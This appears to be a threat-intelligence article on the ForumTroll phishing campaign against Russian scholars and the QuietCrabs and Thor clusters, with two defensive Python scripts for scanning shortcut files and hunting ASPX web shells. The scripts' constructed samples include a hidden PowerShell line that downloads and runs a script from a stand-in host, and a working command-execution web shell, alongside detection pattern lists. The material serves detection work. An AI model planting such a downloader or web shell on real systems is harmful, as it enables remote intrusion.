New ForumTroll Phishing Targeting Russian Scholars: How It Works and What to Do (2026)

A new wave of phishing attacks is targeting Russian scholars with a personalized lure. The threat actor behind Operation ForumTroll is going after people working in political science, international relations and global economics at major Russian universities and research institutions.

Operation ForumTroll was previously documented exploiting a zero-day vulnerability in Google Chrome to deliver its payloads. The wave described here needs no browser exploit: it relies on a convincing ruse, with emails sent from a fake eLibrary address. The sending domain was registered months before the campaign began, which points to a planned operation rather than an opportunistic one.

The emails tell the target to download a plagiarism report. What they actually download is a ZIP archive containing a malicious Windows shortcut (.lnk file). Opening the shortcut runs a PowerShell script that downloads and launches an intermediate payload; that payload then contacts a URL to fetch the final-stage DLL, which gives the threat actors remote access to the victim's device.

The final payload is Tuoni, a command-and-control framework whose agent lets the attackers control the compromised Windows device remotely. The phishing emails are also personalized: each addresses the victim by name and patronymic, the form of address a Russian academic would expect from a legitimate service, which makes the request look familiar and trustworthy.
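The chain above starts with a shortcut file inside a ZIP attachment, so the earliest point at which a defender can catch it is by opening the archive and reading the shortcut's own command line before anyone double-clicks it. The following Python script is an added example, not code from the original article or from Kaspersky: it parses the Shell Link header and StringData fields as laid out in Microsoft's MS-SHLLINK specification, skips the optional ID list and link-info blocks, and flags shortcuts whose target or arguments look like a downloader. The sample archive, file names, the `example.invalid` URL and the indicator list are all constructed for the example and are not ForumTroll indicators.

```python
import io
import re
import struct
import zipfile

# ShellLinkHeader constants from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # "run minimized": common in malicious shortcuts

# StringData fields appear in this fixed order when their flag bit is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))

# Command-line indicators worth flagging in a shortcut that arrived by e-mail (constructed list).
INDICATORS = (
    (r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)(\.exe)?\b", "launches a script interpreter"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(^|\s)-e(nc|ncodedcommand)?\s", "encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin|certutil",
     "downloads from the network"),
    (r"https?://", "embedded URL"),
    (r"rundll32|regsvr32|\.dll\b", "loads a DLL"),
)


def build_lnk(relative_path, arguments, show_command=1):
    """Build a minimal .lnk (no IDList, no LinkInfo, Unicode strings) for the sample archive."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments):           # CountCharacters then UTF-16LE chars, no terminator
        body += struct.pack("<H", len(s)) + s.encode("utf-16le")
    return header + body


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData fields of a Shell Link file."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:        # LinkTargetIDList: 2-byte IDListSize, then the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: 4-byte LinkInfoSize that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    link = {"flags": flags, "show_command": show_command}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            link[field] = data[pos:pos + 2 * count].decode("utf-16le")
            pos += 2 * count
        else:
            link[field] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return link


def scan_archive(zip_bytes):
    """Flag shortcut entries in a ZIP whose target or arguments look like a downloader."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                link = parse_lnk(zf.read(info))
            except ValueError as err:
                findings.append({"entry": info.filename, "verdict": "unparseable", "reasons": [str(err)]})
                continue
            command = (link.get("relative_path", "") + " " + link.get("arguments", "")).strip()
            reasons = [why for pattern, why in INDICATORS if re.search(pattern, command, re.I)]
            if link["show_command"] == SW_SHOWMINNOACTIVE:
                reasons.append("starts minimized")
            if re.search(r"\.(pdf|docx?|xlsx?|txt|rtf)\.lnk$", info.filename, re.I):
                reasons.append("document-looking double extension")
            findings.append({"entry": info.filename, "command": command, "reasons": reasons,
                             "verdict": "suspicious" if reasons else "benign"})
    return findings


def build_sample_archive():
    """Constructed sample archive (not a real ForumTroll artifact): one downloader-style
    shortcut shaped like the described lure, one harmless shortcut, one text file."""
    downloader = build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        '-w hidden -ep bypass -c "iwr http://example.invalid/s.ps1 -OutFile $env:TEMP\\s.ps1; & $env:TEMP\\s.ps1"',
        show_command=SW_SHOWMINNOACTIVE)
    harmless = build_lnk(r"..\Documents\notes.txt", "")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Plagiarism_report.pdf.lnk", downloader)
        zf.writestr("Notes.lnk", harmless)
        zf.writestr("readme.txt", "constructed sample, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_archive()):
        print(finding["verdict"], finding["entry"], "; ".join(finding["reasons"]))
```

The scan deliberately reads the shortcut's target and arguments rather than trusting its icon or file name: a `.pdf.lnk` whose target is `powershell.exe` with a hidden window and a URL in its arguments is the shape of the lure described above, regardless of what the archive claims to contain. Real shortcuts can also carry extra data blocks after the strings (environment variable paths are a common place to hide the real target), so a production version should parse those as well.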

ForumTroll has been active since at least 2022, targeting organizations and individuals in Russia and Belarus. Given that track record, the group is likely to remain a significant threat to entities and individuals in both countries.

Kaspersky's disclosure coincided with a report from Positive Technologies describing two other threat clusters, QuietCrabs and Thor, both of which have been exploiting security flaws in software including Microsoft SharePoint and Ivanti products.

QuietCrabs, suspected to be a Chinese hacking group, plants an ASPX web shell on a compromised server and uses it to deliver the KrustyLoader implant, which in turn drops Sliver, an open-source command-and-control framework. Thor was first observed attacking Russian companies in 2025; it deploys LockBit and Babuk ransomware and uses the legitimate remote-management tools Tactical RMM and MeshAgent to keep persistence and control over victims' systems.
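The QuietCrabs chain begins with an ASPX web shell on the compromised server, and the web shell is the one stage a defender can find by reading files on disk. The script below is an added example, not code from Positive Technologies' report or from this page: it walks a web root, scores every ASP.NET page or handler on whether it reads request input and does something dangerous with it (spawns a process, compiles or loads code, writes to disk), and returns a verdict per file. The directory layout (shaped like a SharePoint `TEMPLATE\LAYOUTS` tree), the three sample pages and the indicator list are constructed for the example; the indicators are the editor's, not a published signature set.

```python
import os
import re
import tempfile

# Indicator patterns for ASP.NET server-side code (constructed list, matched case-insensitively).
INDICATORS = {
    "reads request input": r"\bRequest\s*(\[|\.(Form|QueryString|Headers|Files|Params|InputStream)\b)",
    "spawns a process": r"\b(Process\.Start|ProcessStartInfo)\b|\bcmd\.exe\b|\bpowershell\b",
    "compiles or loads code": r"\b(CodeDomProvider|CompileAssemblyFromSource|Assembly\.Load\w*)\b",
    "writes to disk": r"\b(File\.WriteAll\w+|FileStream|\.SaveAs)\b",
    "decodes an embedded payload": r"\bFromBase64String\b",
    "imports a sensitive namespace": r"Import\s+Namespace\s*=\s*\"System\.(Diagnostics|Reflection|CodeDom)",
}
DANGEROUS = ("spawns a process", "compiles or loads code", "writes to disk")


def score_source(source):
    """Return (verdict, hits): 'webshell' when attacker input reaches a dangerous sink,
    'review' when two or more indicators fire without that pairing, else 'clean'."""
    hits = [name for name, pattern in INDICATORS.items() if re.search(pattern, source, re.I)]
    if "reads request input" in hits and any(h in hits for h in DANGEROUS):
        verdict = "webshell"
    elif len(hits) >= 2:
        verdict = "review"
    else:
        verdict = "clean"
    return verdict, hits


def hunt(root):
    """Walk a web root and score every ASP.NET page or handler under it.
    Keys are paths relative to root with forward slashes, so results are portable."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".aspx", ".ashx", ".asmx")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                key = os.path.relpath(path, root).replace(os.sep, "/")
                results[key] = score_source(fh.read())
    return results


# Constructed samples: a harmless status page, a command-execution web shell, and a page
# that only decodes an embedded blob (enough to earn a manual look, not a verdict).
SAMPLES = {
    "TEMPLATE/LAYOUTS/status.aspx":
        '<%@ Page Language="C#" %>\n'
        '<html><body>Server time: <%= DateTime.Now %></body></html>\n',
    "TEMPLATE/LAYOUTS/diag.aspx":
        '<%@ Page Language="C#" %>\n'
        '<%@ Import Namespace="System.Diagnostics" %>\n'
        '<% var psi = new ProcessStartInfo("cmd.exe", "/c " + Request["c"])\n'
        '       { RedirectStandardOutput = true, UseShellExecute = false };\n'
        '   Response.Write(Process.Start(psi).StandardOutput.ReadToEnd()); %>\n',
    "TEMPLATE/LAYOUTS/export.aspx":
        '<%@ Page Language="C#" %>\n'
        '<%@ Import Namespace="System.Reflection" %>\n'
        '<% var blob = Convert.FromBase64String(Settings.Payload); %>\n',
}


def write_samples():
    """Write the constructed samples into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="aspx_hunt_")
    for rel, body in SAMPLES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, (verdict, hits) in sorted(hunt(write_samples()).items()):
        print(f"{verdict:9} {rel}  {', '.join(hits)}")
```

Pattern matching like this is a triage aid, not proof: a legitimate upload handler reads `Request.Files` and calls `SaveAs`, so it scores as a web shell too. In practice the results should be compared with a known-good baseline of the product's own pages (by hash or by path), and anything new, recently modified, or sitting in a directory the product never writes to is what gets pulled for analysis.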

Taken together, these campaigns mix long-standing techniques (shortcut-file lures, PowerShell downloaders, web shells, abused remote-management tools) with newer tooling such as the Tuoni framework. For the ForumTroll lure specifically, the practical defences follow from the chain: verify the sending domain before acting on any unsolicited "plagiarism report", treat archive attachments that contain shortcut files as hostile at the mail gateway, and alert on PowerShell started from a shortcut that then reaches out to the network. On the server side, unexpected ASPX files on SharePoint hosts and remote-management agents that nobody installed are the indicators to hunt for.


Author: Prof. An Powlowski
